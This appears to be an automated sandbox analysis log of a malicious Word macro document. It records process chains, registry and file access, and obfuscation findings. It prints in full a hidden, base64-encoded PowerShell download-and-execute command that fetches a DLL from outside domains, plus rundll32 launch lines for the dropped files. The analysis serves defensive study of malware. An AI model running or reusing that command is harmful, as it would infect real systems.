Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j......................J.............}..v....H.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....{...............T..j....0IQ...............J.............}..v............0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j......................J.............}..v....H.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............Y.'.).}.}.c.a.t.c.h.{.}.}.$.B.5.8.I.=.(.'.O.3.'.+.'.5.I.'.).....0.u..............EQ.....<....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....@.................J.............}..v............0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v....h.......0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... .................J.............}..v............0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.....r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................J.............}..v....(.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......T..j....0IQ...............J.............}..v............0.u..............EQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....p.................J.............}..v............0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4i.j....E.................J.............}..v....X.......0.u.............H.Q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4i.j....E.................J.............}..v.....5......0.u.............H.Q............................. Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: Arch_2021_717-1562532.doc Virustotal: Detection: 16%
Source: Arch_2021_717-1562532.doc ReversingLabs: Detection: 27%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2105632557.0000000002A50000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Arch_2021_717-1562532.doc Stream path 'Macros/VBA/Gusca95luq_' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Gusca95luq_ Name: Gusca95luq_
Obfuscated command line found
